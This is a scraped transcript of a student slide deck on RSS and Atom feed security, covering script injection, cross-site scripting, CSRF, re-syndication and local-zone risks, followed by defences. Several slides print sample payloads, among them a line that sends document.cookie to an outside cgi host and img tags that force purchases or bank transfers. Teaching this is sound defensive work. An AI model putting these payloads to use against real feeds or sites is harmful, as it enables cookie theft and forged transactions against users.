1 / 11

An analysis of RSS security

An analysis of RSS security. Research Topic Network Security CmpE 209 Dr.Richard Sinn Sarbjeet Singh (005886296) Uma Nandanam (006259825). Introduction. RSS (Really Simple Syndication or Rich Site Summary) is new and efficient content distribution feature using XML format.

orde
Download Presentation

An analysis of RSS security

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. An analysis of RSS security Research Topic Network Security CmpE 209 Dr.Richard Sinn Sarbjeet Singh (005886296) Uma Nandanam (006259825)

  2. Introduction • RSS (Really Simple Syndication or Rich Site Summary) is new and efficient content distribution feature using XML format. • RSS is used to distribute information (stores/news/articles, blog posts, video clips, audio clips etc) on a topic you choose on your favorite website. You need to subscribe to receive this information (called RSS feeds) • This RSS feed come to you and a reader on your computer read this information. The reader could be a stand alone s/w or web based. • Using RSS we don’t waist time looking for the info you need on the websites or wait for the pages to load. • To subscribe to a feed look for a buttons like this on your favorite website • To Subscribe to SJSU for RSS feeds: www.sjsu.edu/rss

  3. RSS Security Vulnerabilities • RSS Security Vulnerabilities • The major RSS security vulnerabilities involve the elements of the feeds. • RSS: feed titles, Item description, Item title, Item link, Item description XML elements. • Atom: Author name, Entry update element, Feed title, Feed sub-title, Feed update • Attackers can inject scripts to these elements. • A few threats: • Phishing (To redirect a user to a malicious website) • Stealing Cookies • Deploying malware • Browser Activity Monitoring

  4. RSS Security Vulnerabilities (Contd.,) HTML literal injections • RSS specifications specify ‘<description>’ tag to allow html entities to comply with html formatting.  However, the specifications do not specify the use of literal html tags inclusions • The Readers treat  “<>” as literals. When a feed contains html tags, in certain cases, the content is displayed literally •  RSS readers or aggregators treat these tags as literals, they execute the scripts (engineered by the attacker) in the feed <?xml version="1.0" encoding="ISO-8859-1"?> <rss version="2.0"> <channel> <title>The title of my RSS 2.0 Feed</title> <link>http://www.vaishnavinandanam.com/</link> <description> <script>alert('Description of feed')</script> </description> <lastBuildDate>Tu, 21 April 2009 18:30:00 GMT</lastBuildDate> <language>en-us</language> <title> <script>alert('Title of an item')</script> </title> <link>http://vaishnavinandanam.com/item/RSS</link> <guid>http:// vaishnavinandanam.com/item/RSS</guid> <pubDate> Tu, 21 April 2009 18:30:00 GMT</pubDate> <description>[CDATA[ This is the description about RSS security examples ]]</description> </item> </channel> </rss>

  5. RSS Security Vulnerabilities (Contd.,) HTML entity injections • Some readers convert HTML entities of the feed to their true values. Potential script injections are inserted in the feeds.The RSS readers convert &lt to '<' and &gt to '>‘, the content is added and viewed by the browser component. Most of the readers store this content to a file in the local directories <title> &lt;script&gt;alert(‘Item Title')&lt;/script&gt; </title> <link>http://host/?&lt;script&gt;alert(‘Item Link')&lt;/script&gt; </link> <description>&lt;script&gt;alert(‘Item Description')&lt;/script&gt; </description> Cross site scripting: • Today most of the web 2.0 sites deliver dynamic contents, Using web based readers can lead Cross site scripting (also called as CSS or XSS) • Examples: Hijacking of accounts, changing the user settings, stealing cookie, theft and false advertising. • stealing cookies from the online web reader <description> <script>document.location='.http://abc/cgi-bin/cookie.cgi? '%20+document.cookie</script>

  6. RSS Security Vulnerabilities (Contd.,) Cross site request forgery (CSRF) • Unauthorized commands are transmitted from a user that the website trusts • Example-1: An attacker can make your computer send requests to a web site using CSRF attacks • The attacker can inject a tag '<image src>' into the feed, and make your computer connect to a website, perform web actions <description> <img src="https://store.vaishnavi.com/buy?item=stamps&quantity=989"> </description> • Example-2: • You are accessing a blog site and accessing a malicious feed • This feed has a malicious JavaScript that can capture the keystocks from your computer and rely it attacker's host • Example-3: • You login to bank.com and authenticate. At the same time you also download a malicious feed<img src= “http://bank.com/transfer?to_account=my_account_number&amount=all_of_your_money> • A request is issued from your( you became the victim) browser to the bank’s website for transfer on money.

  7. RSS Security Vulnerabilities (Contd.,) Re-syndication Venerability • Server-1 stores a malicious feed, this feed is downloaded by the subscribers including other servers (server-2 and server-3) • Servers-2 and 3 creates a web feed including server-1's feed content without sanitizing it • This content on server-2 and 3 is downloaded by the respective subscribers of Server2 and 3 • In this process of re-syndicating, many clients get effected. Server-2 Feed also includes Server-1 feed Server-1 stores malicious feed I N T E R N E T Server-3 Feed also includes Server-1 feed

  8. RSS Security Vulnerabilities (Contd.,) Local zone risks • Effects the subscriber’s system. Readers typically convert the feed into an html file and store it in a local directory • This file is loaded on to a browser instance. This file can have ActiveX objects with permissions to read/write files to the disk • This feed can be engineered to read a local file and send a copy to a the attacker’s intended host in the Internet. RSS Spam • Keyword surfing • Link farms • Fake RSS feeds • How to protect: • A user can unsubscribe for the feed

  9. Conclusions Venurabilites are becasuse of: • Feed is malicious • The site that provides the feed is hacked. • The webbased feed is created from mailing lists, bulletin boards messages, p2p • Feed is modified during transport • It is extremely difficult to safely consume RSS feed • The feed elements such as the <description> element allow arbitrary encoded html • Arbitrary codes can carry venerable payloads • RSS readers should remove html entities and meta characters before displaying the feed to the user. Sanitize the feed by looking and stripoff venurable tages. • Knowing the security implications regarding feeds and readers will help you avoid some things such as CSS • Before displaying the feed a safe RSS reader can strip tags such as, script, embed, object, frameset, meta, link, style etc • Attackers don’t just expore weaknesses on server but also on client. Client-side vernubilities: engineer scripts in the feed and extract information • In the case of feed readers, ensure that scripts, applets, and plug-ins are disabled • Regular expressions can be used to filter script tags from user-supplied inputs

  10. References • [1] Zero Day Subscriptions: Using RSS and Atom Feeds As Attack Delivery Systems by: Bob Auger (Presented at Black Hat USA 2006) http://h71028.www7.hp.com/enterprise/downloads/BobAuger-RSS_Security.pdf • [2] Blackhat 2006 RSS Security resourcesVideo presentation: http://media.blackhat.com/bh-usa-06/video/2006_BlackHat_Vegas-V36-Auger_and_Sima-0day_subscriptions.mp4 (Video Presentation)Slides: http://www.cgisecurity.com/papers/RSS-Security.ppt Paper: http://www.cgisecurity.com/papers/HackingFeeds.pdf • [3] Feed Injection in Web 2.0: Hacking RSS and Atom Feed Implementations http://www.cgisecurity.com/papers/HackingFeeds.pdf • [4] Zero Day Subscriptions: Using RSS and Atom Feeds As Attack Delivery Systemshttp://www.cgisecurity.com/papers/RSS-Security.ppt • [5] RSS Specificationhttp://www.rss-specifications.com/rss-specifications.htm • [6] Rss security realted papershttp://www.cgisecurity.com/papers/ • [7] The Cross-Site Scripting (XSS) FAQhttp://www.cgisecurity.com/xss-faq.html • [8] CGISecurity Article: The Cross-Site Request Forgery FAQhttp://www.cgisecurity.com/csrf-faq.html

  11. “Things that think…don’t make sense unless they link.” - Nicholas Negroponte, MIT Media Laboratory

More Related